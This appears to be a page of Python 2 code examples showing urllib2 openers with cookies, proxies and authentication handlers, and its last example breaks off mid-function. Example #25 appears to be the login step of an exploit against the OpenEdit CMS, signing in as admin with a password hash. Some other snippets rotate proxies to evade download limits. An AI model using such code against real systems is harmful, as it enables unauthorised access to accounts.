Example #1
    def get(self,url):
        ''' GET the given URL from the web site, returning the response stream.
            @param url: the URL to fetch
            '''
        url=url.strip()
        cj = cookielib.MozillaCookieJar()
        #sys.exit(0)
        try:
            cj.load(self.cookie_file)
        except:
            pass
        if self.proxy is not None:
            print "set proxy...",self.proxy
            proxy_support = urllib2.ProxyHandler(self.proxy)
            #{"http":"http://ahad-haam:3128"})
            opener = urllib2.build_opener(
                        urllib2.HTTPCookieProcessor(cj),
                        proxy_support
                    )
        else:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

        opener.addheaders= [('User-Agent',self.user_agent),('Range',"bytes=0-%d" % self.range)]
        try:
            stream=opener.open(url)
            return stream
        except urllib2.HTTPError,e:
            raise hyer.error.HTTPError("can't download URL:%s" % url)
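A minimal standalone sketch of the same pattern (the cookie file, proxy address, and byte range here are assumptions, not values taken from the class above):

import cookielib
import urllib2

cj = cookielib.MozillaCookieJar()
try:
    cj.load('cookies.txt')  # hypothetical cookie file; may not exist on first run
except IOError:
    pass
proxy_support = urllib2.ProxyHandler({'http': 'http://127.0.0.1:3128'})  # assumed proxy
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), proxy_support)
opener.addheaders = [('User-Agent', 'Mozilla/5.0'), ('Range', 'bytes=0-1023')]
stream = opener.open('http://example.com/')
print stream.read()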
Example #2
def open(url, query_params=None, user_agent=None, post_data=None,
         get_method=None, cookies=False, **kwargs):

    if query_params is None:
        query_params = {}

    if user_agent is None:
        user_agent = ua_aimable

    query_params.update(kwargs)

    url = prepare_url(url, query_params)

    request = urllib2.Request(url, post_data)

    if get_method is not None:
        request.get_method = lambda: get_method

    request.add_header('User-Agent', user_agent)

    if cookies:
        # `jar` is assumed to be a module-level cookielib.CookieJar shared
        # across calls, so cookies persist between requests
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    else:
        opener = urllib2.build_opener()

    return opener.open(request)
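Hypothetical usage of the helper above, assuming `prepare_url` merges the query parameters into the URL and `ua_aimable` and `jar` are module-level defaults:

# plain GET with extra query parameters passed as kwargs
page = open('http://example.com/search', q='urllib2', page=2)
print page.read()

# DELETE request with the shared cookie jar enabled
resp = open('http://example.com/item/1', get_method='DELETE', cookies=True)
print resp.getcode()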
Example #3
def play_fourshared(url, name):
	global media_id
	xbmc.log("starting 4shared method with: %s and %s" % (name, url))
	username = '******'
	password = '******'
	cookie_file = os.path.join(__profilepath__, 'pktemp.cookies')
	media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id)))
	cj = cookielib.LWPCookieJar()
	media_id = media_id + 1

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password)
	xbmc.log("logging in to 4shared: " + loginurl)
	resp = opener.open(loginurl)

	cj.save(cookie_file, ignore_discard=True)
	cj.load(cookie_file, ignore_discard=True)

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	urllib2.install_opener(opener)

	usock = opener.open(url)
	data = usock.read()
	#media_file = usock.geturl()
	usock.close()

	fp = open(media_file, 'wb')
	fp.write(data)
	fp.close()

	#play_stream(media_file, name)
	print "playing stream name: " + str(name) + " url: " + str(media_file)
	listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_file )
	listitem.setInfo( type="Music", infoLabels={ "Title": name } )
	xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER ).play( str(media_file), listitem)
Example #4
    def send(self, uri, data=''):
        url = self.base_url + str(uri)
        req = urllib2.Request(url)
        # cookie enabled
        if self.cookie == '':
            self.cookie = cookielib.CookieJar()

        cookie_handler = urllib2.HTTPCookieProcessor(self.cookie)

        if self.debug:
            http_handler = urllib2.HTTPHandler(debuglevel=1)
            opener = urllib2.build_opener(cookie_handler, http_handler)
        else:
            opener = urllib2.build_opener(cookie_handler)

        req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0')
        req.add_header('Content-Type', 'application/x-www-form-urlencoded')
        req.add_header('Cache-Control', 'no-cache')
        req.add_header('Accept', '*/*')
        req.add_header('Connection', 'close')
        # post data
        if data:
            post_data = urllib.urlencode(data)
            req.add_data(post_data)
            req.add_header('Content-Length', len(post_data))
        try:
            response = opener.open(req)
            return response
        except urllib2.URLError, error:
            raise FetionError(400)
Example #5
    def __init__(self, server_url, user_id, device_id, client_version,
                 proxies=None, proxy_exceptions=None,
                 password=None, token=None, repository="default",
                 ignored_prefixes=None, ignored_suffixes=None,
                 timeout=20, blob_timeout=None, cookie_jar=None,
                 upload_tmp_dir=None):
        self.timeout = timeout
        self.blob_timeout = blob_timeout
        if ignored_prefixes is not None:
            self.ignored_prefixes = ignored_prefixes
        else:
            self.ignored_prefixes = DEFAULT_IGNORED_PREFIXES

        if ignored_suffixes is not None:
            self.ignored_suffixes = ignored_suffixes
        else:
            self.ignored_suffixes = DEFAULT_IGNORED_SUFFIXES

        self.upload_tmp_dir = (upload_tmp_dir if upload_tmp_dir is not None
                               else tempfile.gettempdir())

        if not server_url.endswith('/'):
            server_url += '/'
        self.server_url = server_url

        # TODO: actually use the repository info in the requests
        self.repository = repository

        self.user_id = user_id
        self.device_id = device_id
        self.client_version = client_version
        self._update_auth(password=password, token=token)

        self.cookie_jar = cookie_jar
        cookie_processor = urllib2.HTTPCookieProcessor(
            cookiejar=cookie_jar)

        # Get proxy handler
        proxy_handler = get_proxy_handler(proxies,
                                          proxy_exceptions=proxy_exceptions,
                                          url=self.server_url)

        # Build URL openers
        self.opener = urllib2.build_opener(cookie_processor, proxy_handler)
        self.streaming_opener = urllib2.build_opener(cookie_processor,
                                                     proxy_handler,
                                                     *get_handlers())

        # Set Proxy flag
        self.is_proxy = False
        for handler in self.opener.handlers:
            if isinstance(handler, ProxyHandler):
                if handler.proxies:
                    self.is_proxy = True

        self.automation_url = server_url + 'site/automation/'
        self.batch_upload_url = 'batch/upload'
        self.batch_execute_url = 'batch/execute'

        self.fetch_api()
Example #6
 def create_opener(self):
     """
         creates http-link opener based on options choosen
     """
     self.opener = urllib2.build_opener()
     if not self.allow_redirects:
         self.opener = urllib2.build_opener(BalerionRedirectHandler)    
Example #7
	def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None):
		"Method sets up a REST call with mixed body data such as multipart/form-data."
		
		# check whether proxy is given
		if "proxy" in globals():
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
				
		multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
		urllib2.install_opener(multipart)
		
		req = urllib2.Request(url, dic.parameters())

		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		
		# sets additional header fields
		if additionalOptions is not None:
			for key in additionalOptions:
				req.add_header(key, additionalOptions[key])
		
		try:
			response = urllib2.urlopen(req)
			
			response = json.loads(response.read())	
			
			return response
		
		except urllib2.HTTPError as e:
			
			raise TelekomException(json.loads(e.read()))
Example #8
 def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None, cookie=None, output='', timeout='10'):
     if proxy is not None:
         proxy_handler = urllib2.ProxyHandler({'http': '%s' % (proxy)})
         opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
         # install_opener returns None, so don't assign its result back to opener
         urllib2.install_opener(opener)
     if output == 'cookie' or close is not True:
         import cookielib
         cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
         opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
         urllib2.install_opener(opener)
     if post is not None:
         request = urllib2.Request(url, post)
     else:
         request = urllib2.Request(url,None)
     if mobile == True:
         request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
     else:
         request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
     if not referer is None:
         request.add_header('Referer', referer)
     if not cookie is None:
         request.add_header('cookie', cookie)
     response = urllib2.urlopen(request, timeout=int(timeout))
     if output == 'cookie':
         result = str(response.headers.get('Set-Cookie'))
     elif output == 'geturl':
         result = response.geturl()
     else:
         result = response.read()
     if close == True:
         response.close()
     self.result = result
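A hedged usage sketch; the class name `getUrl` is an assumption, since the snippet does not show it:

html = getUrl('http://example.com/').result                      # plain GET
ck = getUrl('http://example.com/', output='cookie').result       # Set-Cookie header only
final = getUrl('http://example.com/', mobile=True,
               referer='http://example.com/', output='geturl').result  # final URL after redirects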
Example #9
	def serveFile(self, fURL, sendData, httphandler = None):
		cj = cookielib.LWPCookieJar(ustvpaths.COOKIE) 
		if httphandler is None:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		else:
			opener = urllib2.build_opener(httphandler, urllib2.HTTPCookieProcessor(cj))
		request = urllib2.Request(url = fURL)
		opener.addheaders = []
		d = {}
		sheaders = self.decodeHeaderString(''.join(self.headers.headers))
		for key in sheaders:
			d[key] = sheaders[key]
			if key == 'User-Agent':
				# spoof the User-Agent instead of forwarding the client's
				opener.addheaders.append(('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'))
			elif key != 'Host':
				# forward every other header; assigning a fresh list here
				# would throw away the headers collected so far
				opener.addheaders.append((key, sheaders[key]))
		if os.path.isfile(ustvpaths.COOKIE):
			cj.load(ignore_discard = True)
			cj.add_cookie_header(request)
		response = opener.open(request, timeout = TIMEOUT)
		self.send_response(200)
		headers = response.info()
		for key in headers:
			try:
				val = headers[key]
				self.send_header(key, val)
			except Exception, e:
				print e
Example #10
def BuildURLOpener(server):
    """
    if there should be no proxy used use an empty proxy_handler - only necessary in Windows,
    where IE proxy settings are used automatically if available
    In UNIX $HTTP_PROXY will be used
    The MultipartPostHandler is needed for submitting multipart forms from Opsview
    """
    # trying with changed digest/basic auth order as some digest auth servers do not
    # seem to work wi the previous way
    if str(server.use_proxy) == "False":
        server.proxy_handler = urllib2.ProxyHandler({})
        urlopener = urllib2.build_opener(server.digest_handler,\
                                         server.basic_handler,\
                                         server.proxy_handler,\
                                         urllib2.HTTPCookieProcessor(server.Cookie),\
                                         MultipartPostHandler)
    elif str(server.use_proxy) == "True":
        if str(server.use_proxy_from_os) == "True":
            urlopener = urllib2.build_opener(server.digest_handler,\
                                             server.basic_handler,\
                                             urllib2.HTTPCookieProcessor(server.Cookie),\
                                             MultipartPostHandler)
        else:
            # if the OS proxy is not used, an authenticated proxy handler has to be added
            server.passman.add_password(None, server.proxy_address, server.proxy_username, server.proxy_password)
            server.proxy_handler = urllib2.ProxyHandler({"http": server.proxy_address, "https": server.proxy_address})
            server.proxy_auth_handler = urllib2.ProxyBasicAuthHandler(server.passman)
            urlopener = urllib2.build_opener(server.proxy_handler,\
                                            server.proxy_auth_handler,\
                                            server.digest_handler,\
                                            server.basic_handler,\
                                            urllib2.HTTPCookieProcessor(server.Cookie),\
                                            MultipartPostHandler)
    return urlopener
Example #11
    def get_html(self):

        # add cookie support
        cookie = cookielib.CookieJar()
        cookie_handler = urllib2.HTTPCookieProcessor(cookie)

        if self.agents:
            agent = choice(self.agents)
        else:
            agent = None

        # add proxy support (despite the name, the entries in self.agents
        # are used here as proxy addresses)
        if agent:
            proxy_handler = urllib2.ProxyHandler({'http': agent})
            # proxy_handler = urllib2.ProxyHandler({'https': agent})
            opener = urllib2.build_opener(cookie_handler, proxy_handler)
        else:
            opener = urllib2.build_opener(cookie_handler)

        urllib2.install_opener(opener)
        try:
            datas = []
            for url in self.get_urls:
                req = urllib2.Request(url, headers=self.header)
                html = urllib2.urlopen(req, timeout=30).read()
                # add chinese support
                code = chardet.detect(html)['encoding']
                if code in self.zh_code:
                    html = html.decode('GBK').encode('utf-8')
                datas.append(html)
            return datas
        except Exception:
            # re-raise as-is; wrapping in Exception(e) would lose the
            # original type and traceback
            raise
Example #12
 def send(self, req):
     # req is our own Request object
     if HTTP_DEBUG:
         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar), urllib2.HTTPHandler(debuglevel=1))
     elif COOKIES_ENABLED:
         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar))
     else:
         opener = urllib2.build_opener()
     if req.method.upper() == 'POST':
         request = urllib2.Request(req.url, req.body, req.headers)
     else:  
         request = urllib2.Request(req.url, None, req.headers)  # urllib2 assumes a GET if no data is supplied.  PUT and DELETE are not supported
     
     # timed message send+receive (TTLB)
     req_start_time = self.default_timer()
     try:
         resp = opener.open(request)  # this sends the HTTP request and returns as soon as it is done connecting and sending
         connect_end_time = self.default_timer()
         content = resp.read()
         req_end_time = self.default_timer()
     except httplib.HTTPException, e:  # this can happen on an incomplete read, just catch all HTTPException
         connect_end_time = self.default_timer()
         resp = ErrorResponse()
         resp.code = 0
         resp.msg = str(e)
         resp.headers = {}
         content = ''
Example #13
    def getResult(self, ip, cookieHandle, fileID):
        try:

            user_agent = random.choice(self.user_agents)
            proxy = urllib2.ProxyHandler({'http': ip})
            # one opener carrying both the proxy and the cookie handler;
            # rebuilding the opener afterwards would discard the proxy and
            # the headers set below
            opener = urllib2.build_opener(proxy, cookieHandle)
            opener.addheaders = [
                ('User-Agent', user_agent),
                ('Referer', 'http://www.sufile.com/down/' + fileID + '.html'),
                ('Host', 'www.sufile.com'),
                ('DNT', '1')
            ]
            r = opener.open('http://www.sufile.com/dd.php?file_key='+fileID+'&p=0', timeout=10)
            d = r.read()

            with open('./result.html', 'wb') as f:
                f.write(d)


            p = re.compile('<a id="downs" href="(.*?)"', re.S)
            r = re.search(p, d)
            print r.group(1).strip()


        except urllib2.HTTPError, e:
            print 'HTTPError: ' + str(e.code)
            return False
Example #14
 def testCreateItem(self):
     """ Ensure that items can be created
     """
     # first, retrieve an item template
     my_opener = urllib2.build_opener(MyHTTPSHandler(self.item_templt, 200))
     z.urllib2.install_opener(my_opener)
     zot = z.Zotero('myuserID', 'myuserkey')
     t = zot.item_template('book')
     # Update the item type
     t['itemType'] = 'journalArticle'
     # Add keys which should be removed before the data is sent
     t['key'] = 'KEYABC123'
     t['etag'] = 'TAGABC123'
     t['group_id'] = 'GROUPABC123'
     t['updated'] = '14 March, 2011'
     # new opener which will return 403
     my_opener = urllib2.build_opener(MyHTTPSHandler(self.items_doc, 403))
     z.urllib2.install_opener(my_opener)
     with self.assertRaises(z.ze.UserNotAuthorised) as e:
         _ = zot.create_items([t])
     exc = str(e.exception)
     # this test is a kludge; we're checking the POST data in the 403 response
     self.assertIn("journalArticle", exc)
     self.assertNotIn("KEYABC123", exc)
     self.assertNotIn("TAGABC123", exc)
     self.assertNotIn("GROUPABC123", exc)
     self.assertNotIn("updated", exc)
Example #15
    def __init__ (self, base, params, user=None, password=None):
        self.base    = base
        if self.base[-1] not in "?&":
            if "?" in self.base:
                self.base += "&"
            else:
                self.base += "?"

        self.params  = {}
        if user is not None and password is not None:
           x = urllib2.HTTPPasswordMgrWithDefaultRealm()
           x.add_password(None, base, user, password)
           auth = urllib2.HTTPBasicAuthHandler(x)
           self.client  = urllib2.build_opener(auth)
        else:
           self.client  = urllib2.build_opener()

        for key, val in self.defaultParams.items():
            if self.base.lower().rfind("%s=" % key.lower()) == -1:
                self.params[key] = val
        for key in self.fields:
            if key in params:
                self.params[key] = params[key]
            elif self.base.lower().rfind("%s=" % key.lower()) == -1:
                self.params[key] = ""
Example #16
 def __checkAndSetUrlLib(self):
     '''
     Private member function called for analyzing and setting proxy settings for urllib2.
     
     This helps in accessing and downloading the contents from the web for later processing and
     parsing of the contents.
     '''
     __proxy = None
     __auth = None
     __opener = None
     
     if ( self.__checkKey('_proxy')):
         __proxy = urllib2.ProxyHandler({'http':self.__dict__['_proxy'], 'https':self.__dict__['_proxy']})
         __opener = urllib2.build_opener(__proxy)
         
     if ( self.__checkKey('_username') and self.__checkKey('_password')):
         passManager = urllib2.HTTPPasswordMgrWithDefaultRealm()
         if ( self.__checkKey('_auth_base')):
             passManager.add_password(None, self.__dict__['_auth_base'], self.__dict__['_username'], self.__dict__['_password'])
         else:
             passManager.add_password(None, self.__dict__['_url'], self.__dict__['_username'], self.__dict__['_password'])
         
         __auth = urllib2.HTTPBasicAuthHandler(passManager)
         # combine with any proxy handler configured above, otherwise the
         # auth-only opener would silently drop the proxy
         if __proxy is not None:
             __opener = urllib2.build_opener(__proxy, __auth)
         else:
             __opener = urllib2.build_opener(__auth)
         
     if ( __opener != None ):
         urllib2.install_opener(__opener)
Example #17
File: web.py Project: Haus1/willie
def get_urllib_object(uri, timeout, headers=None, verify_ssl=True, data=None):
    """Return a urllib2 object for `uri` and `timeout` and `headers`.

    This is better than using urllib2 directly, for it handles SSL verification, makes
    sure the URI is utf8, and is shorter and easier to use.  Modules may use this
    if they need a urllib2 object to execute .read() on.

    For more information, refer to the urllib2 documentation.

    """

    uri = quote_query(uri)
    original_headers = {'Accept': '*/*', 'User-Agent': 'Mozilla/5.0 (Willie)'}
    if headers is not None:
        original_headers.update(headers)
    # use the merged dict either way; the caller's headers override the
    # defaults but should not replace them wholesale
    headers = original_headers
    if verify_ssl:
        opener = urllib2.build_opener(VerifiedHTTPSHandler)
    else:
        opener = urllib2.build_opener()
    req = urllib2.Request(uri, headers=headers, data=data)
    try:
        u = opener.open(req, None, timeout)
    except urllib2.HTTPError as e:
        # Even when there's an error (say HTTP 404), return page contents
        return e.fp

    return u
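A hypothetical call (the `VerifiedHTTPSHandler` and `quote_query` helpers come from the same willie module and are not shown):

u = get_urllib_object('https://example.com/api', 10,
                      headers={'Accept': 'application/json'})
print u.read()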
Example #18
	def __init__(self, username, password):
		self.username = username
		self.password = password
		self.pcid = ""
		cj = cookielib.CookieJar()
		cookie_support = urllib2.HTTPCookieProcessor(cj)

		# add proxy IPs
		proxy_enabled = 0
		self.iplist = []
		try:
			cur_dir = os.path.dirname(os.path.realpath(__file__))
			for line in open(os.path.join(cur_dir, r'f:/getip.ip'), 'r'):
				self.iplist += [line.strip()]
		except IOError:
			print "IOError in sethp opening getip.ip"
			pass
		if len(self.iplist) and proxy_enabled:
			ip = random.choice(self.iplist)
			print ip, type(ip)
			proxy_support = urllib2.ProxyHandler({'http':'http://'+ip})
			# self.opener = urllib2.build_opener( proxy_support, cookie_support, urllib2.HTTPHandler)
			self.opener = urllib2.build_opener( proxy_support, cookie_support, urllib2.HTTPHandler )
			# self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
			# self.opener = urllib2.build_opener(proxy)
		else:
			self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
		urllib2.install_opener(self.opener)
Example #19
def getContent(target_url, cert_path, key_path, post_data=None, debug=False, adfslogin=None):
  opener = urllib2.build_opener(urllib2.HTTPSHandler())
  if adfslogin:
    opener.addheaders = [('Adfs-Login', adfslogin)] #local version of tc test
  
  #try to access the url first
  try:
    content = getResponseContent(opener, target_url, post_data, debug)
    if not 'Sign in with your CERN account' in content:
      return content
  except Exception:
    if debug:
      sys.stderr.write("The request has an error, will try to create a new cookie\n")

  cookie = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie), HTTPSClientAuthHandler(key_path, cert_path))  #will use private key and certificate
  if debug:
    sys.stderr.write("The return page is sso login page, will request cookie.")
  hasCookie = False
  # if the access gave an exception, try to get a cookie
  try:
    getSSOCookie(opener, target_url, cookie, debug)
    hasCookie = True 
    result = getResponseContent(opener, target_url, post_data, debug)
  except Exception as e:
    result = ""
    sys.stderr.write("ERROR: " + str(e) + "\n")
  if hasCookie:
    burl = getParentURL(target_url)
    try:
      _getResponse(opener, burl+"signOut").read()
      _getResponse(opener, "https://login.cern.ch/adfs/ls/?wa=wsignout1.0").read()
    except:
      sys.stderr.write("Error, could not logout correctly from server") 
  return result
Example #20
    def _request(self, url, data=None, method=None):
        """Send an HTTP request to the remote server.

        Args:
          method - A string for the HTTP method to send the request with.
          url - The URL to send the request to.
          data - The message body to send.

        Returns:
          A dictionary with the server's parsed JSON response.
        """
        LOGGER.debug('%s %s %s' % (method, url, data))

        parsed_url = urlparse.urlparse(url)
        auth = None
        password_manager = None
        if parsed_url.username:
            netloc = parsed_url.hostname
            if parsed_url.port:
                netloc += ":%s" % parsed_url.port
            cleaned_url = urlparse.urlunparse((parsed_url.scheme, netloc, parsed_url.path,
                parsed_url.params, parsed_url.query, parsed_url.fragment))
            password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_manager.add_password(None, "%s://%s" % (parsed_url.scheme, netloc), parsed_url.username, parsed_url.password)
            request = Request(cleaned_url, data=data, method=method)
        else:
            request = Request(url, data=data, method=method)


        request.add_header('Accept', 'application/json')

        if password_manager:
            opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),
                                          HttpErrorHandler(),
                                          urllib2.HTTPBasicAuthHandler(password_manager))
        else:
            opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),
                                          HttpErrorHandler())
        response = opener.open(request)
        try:
            if response.code > 399 and response.code < 500:
                return {'status': response.code, 'value': response.read()}
            body = response.read().replace('\x00', '').strip()
            content_type = response.info().getheader('Content-Type') or []
            if 'application/json' in content_type:
                data = utils.load_json(body.strip())
                assert type(data) is dict, (
                    'Invalid server response body: %s' % body)
                assert 'status' in data, (
                    'Invalid server response; no status: %s' % body)
                # Some of the drivers incorrectly return a response
                # with no 'value' field when they should return null.
                if 'value' not in data:
                    data['value'] = None
                return data
            elif 'image/png' in content_type:
                data = {'status': 0, 'value': body.strip()}
                return data
        finally:
            response.close()
Example #21
def http_send(url, body="", exheaders=None, method=False, proxy_info=False):
	headers = {
			"Connection": "Keep-Alive",
			"Cache-Control": "no-cache"
	}
	# a None default is safer than a string: dict.update() on a non-empty
	# string would raise, and a mutable {} default would be shared
	if exheaders:
		headers.update(exheaders)
	
	if not proxy_info:
		proxy_info = get_proxy_info()
		
	if proxy_info:
		proxy_support = urllib2.ProxyHandler(
											{"http":"http://%(user)s:%(pass)s@%(host)s:%(port)d" % proxy_info})
		opener = urllib2.build_opener(proxy_support)
	else:
		opener = urllib2.build_opener()
	
	urllib2.install_opener(opener)
	
	if body is None or len(body.strip()) == 0:
		request = urllib2.Request(url, headers=headers)
	else:
		request = urllib2.Request(url, headers=headers, data=body)
	
	try:
		conn = urllib2.urlopen(request)
	except Exception, e:
		print "[Error] Failed while http send.", e
		print "Retry......"
		
		try:
			conn = urllib2.urlopen(request)
		except Exception, e:
			print "[Error] Retry failed while http send.", e
			return None

	return conn
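Hypothetical usage of `http_send` above:

resp = http_send('http://example.com/api',
                 body='key=value',
                 exheaders={'Content-Type': 'application/x-www-form-urlencoded'})
if resp is not None:
    print resp.read()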
Example #22
def notify(field, args) :
    if peer == '':
        return
    #args['token'] = token
    if debug :
        log = open('/tmp/ticket_listener', 'a')
        log.writelines('in \n')
    if field not in functions :
        return
    url = peer + functions[field]
    postData=json.dumps(args)
    if use_htaccess :
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, url, htaccess['login'], htaccess['pwd'])
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
    else :
        opener = urllib2.build_opener()
    req =  urllib2.Request(url, postData, {'Content-Type': 'application/json'})
    urllib2.install_opener(opener)
    res = urllib2.urlopen(req)
    if debug :
        log.writelines('url : %s\nPOST data : %s\nresponse : %s\ninfo : %s'%(url, str(args), res.read(), res.info()))
        log.writelines('out \n')
        log.close()
Example #23
    def refresh_feed(self, rssurl):
        """
        Parses through the content of rss feed, using a proxy, if configured,
        uses cache for the feed content if memcached is in use.

        :param str rssurl: URL to RSS Feed
        :returns: List of RSS entries
        """
        headers = []

        opener = urllib2.build_opener()
        proxy = self.http_proxy

        # If proxy set, add custom handlers
        if proxy:
            urlinfo = urlparse(proxy)
            proxyhandler = urllib2.ProxyHandler({urlinfo.scheme : proxy})
            opener = urllib2.build_opener(proxyhandler, urllib2.HTTPHandler, urllib2.HTTPSHandler)

        # TODO: Use feedparser
        xml = minidom.parse(opener.open(rssurl))
        if xml:
            root = xml.documentElement
            for node in root.childNodes:
                if node.nodeName == "item":
                    headers.append(self.get_header(node))
                if node.nodeName == "channel":
                    for channel_child in node.childNodes:
                        if channel_child.nodeName == "item":
                            headers.append(self.get_header(channel_child))

        return headers
Example #24
 def getOpener(self):
     #return the opener
     cj=cookielib.CookieJar()
     if self.__proxy is not None:
         return urllib2.build_opener(urllib2.ProxyHandler({"http":self.__proxy}),urllib2.HTTPCookieProcessor(cj))
     else:
         return urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 
Example #25
def doLogin(adminHash):
	sys.stdout.write("(+) Logging into CMS.. ")
	sys.stdout.flush()
	adminIndex = "http://" + options.target + options.dirPath + "openedit/authentication/logon.html"
	values = {'loginokpage' : '', 'accountname' : 'admin', 'password' : adminHash, 'submit' : 'Login'}
	data = urllib.urlencode(values)
	cj = CookieJar()
	if options.proxy:
		try:
			opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
			opener.addheaders = [('User-agent', agent)]
			check = opener.open(adminIndex, data).read()
		except:
			print "\n(-) Proxy connection failed to remote target"
			sys.exit(1)
	else:
		try:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
			check = opener.open(adminIndex, data).read()
		except:
			print "(-) Target connection failed, check your address"
			sys.exit(1)
	if not re.search("Please enter your password", check):
		sys.stdout.write("logged in successfully\n")
		sys.stdout.flush()
		return cj
	else:
		sys.stdout.write("Login Failed! Exiting..\n")
		sys.stdout.flush()
		sys.exit(1)
Example #26
File: net.py Project: newagemusic/b
    def call_service(self):
        """调用远程服务"""
        try:
            encode_data = None
            if self.params is not None:
                if self.method == 'GET':
                    self.url += '?' + urlencode(self.params)
                    log_debug(self.url)

                elif self.method == 'POST':
                    encode_data = urlencode(self.params)

            if self.cookie_jar is not None:
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar))
            else:
                opener = urllib2.build_opener()
            # set the headers on whichever opener was built, so they are not
            # lost when a cookie jar is used
            opener.addheaders = self.headers

            res_obj = opener.open(self.url, data=encode_data, timeout=self.timeout)
            self.set_cookie = res_obj.info().getheader('Set-Cookie')
            self.res = res_obj.read()

            # encoding
            self.encoding = guess_json_utf(self.res)
            if self.encoding:
                self.res = self.res.decode(self.encoding)

            self.json = json.loads(self.res)
            self.ret  = self.json.get('ret')
            self.msg  = self.json.get('msg')
            self.data = self.json.get('data')
        except Exception, e:
            #log_error('[JSONService] url:%s, response:%s, expetion:%s' % (self.url, self.res, e))
            return False
Example #27
def continuity(url):
    import md5
    format = '%25s: %s'

    # first fetch the file with the normal http handler
    opener = urllib2.build_opener()
    urllib2.install_opener(opener)
    fo = urllib2.urlopen(url)
    foo = fo.read()
    fo.close()
    m = md5.new(foo)
    print format % ('normal urllib', m.hexdigest())

    # now install the keepalive handler and try again
    opener = urllib2.build_opener(HTTPHandler())
    urllib2.install_opener(opener)

    fo = urllib2.urlopen(url)
    foo = fo.read()
    fo.close()
    m = md5.new(foo)
    print format % ('keepalive read', m.hexdigest())

    fo = urllib2.urlopen(url)
    foo = ''
    while 1:
        f = fo.readline()
        if f: foo = foo + f
        else: break
    fo.close()
    m = md5.new(foo)
    print format % ('keepalive readline', m.hexdigest())
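Hypothetical invocation of the continuity check above (the keepalive `HTTPHandler` is assumed to be importable in the same module):

continuity('http://example.com/')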
Example #28
def send_web_socket(Cookie_Jar,url_to_call):
    try:
        import urllib2
        import base64
        import uuid
        req = urllib2.Request(url_to_call)

        str_guid=str(uuid.uuid1()).upper()
        str_guid=base64.b64encode(str_guid)
        req.add_header('Connection', 'Upgrade')
        req.add_header('Upgrade', 'websocket')

        req.add_header('Sec-WebSocket-Key', str_guid)
        req.add_header('Origin','http://www.streamafrik.com')
        req.add_header('Pragma','no-cache')
        req.add_header('Cache-Control','no-cache')
        req.add_header('Sec-WebSocket-Version', '13')
        req.add_header('Sec-WebSocket-Extensions', 'permessage-deflate; client_max_window_bits, x-webkit-deflate-frame')
        req.add_header('User-Agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53')
        cookie_handler = urllib2.HTTPCookieProcessor(Cookie_Jar)
        opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
        # install_opener returns None, so don't assign its result back
        urllib2.install_opener(opener)
        from keepalive import HTTPHandler
        keepalive_handler = HTTPHandler()
        # keep the cookie handler when switching to the keepalive opener
        opener = urllib2.build_opener(keepalive_handler, cookie_handler)
        urllib2.install_opener(opener)
        response = urllib2.urlopen(req)
        response.close()
        return ''
    except: traceback.print_exc(file=sys.stdout)
    return ''
Example #29
def loadUrl(url, profiler, enable_proxy = False):
    loadtime = 0
    try:
        begin = time.time()
        req = urllib2.Request(url)
        req.add_header("User-Agent", "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36")
        req.add_header("Accept-Encoding", "gzip,deflate,sdch")
        req.add_header("Accept", "*/*")
        req.add_header("Cache-Control", "no-cache")
        if enable_proxy:
            print "USE Turbo Proxy!!!"
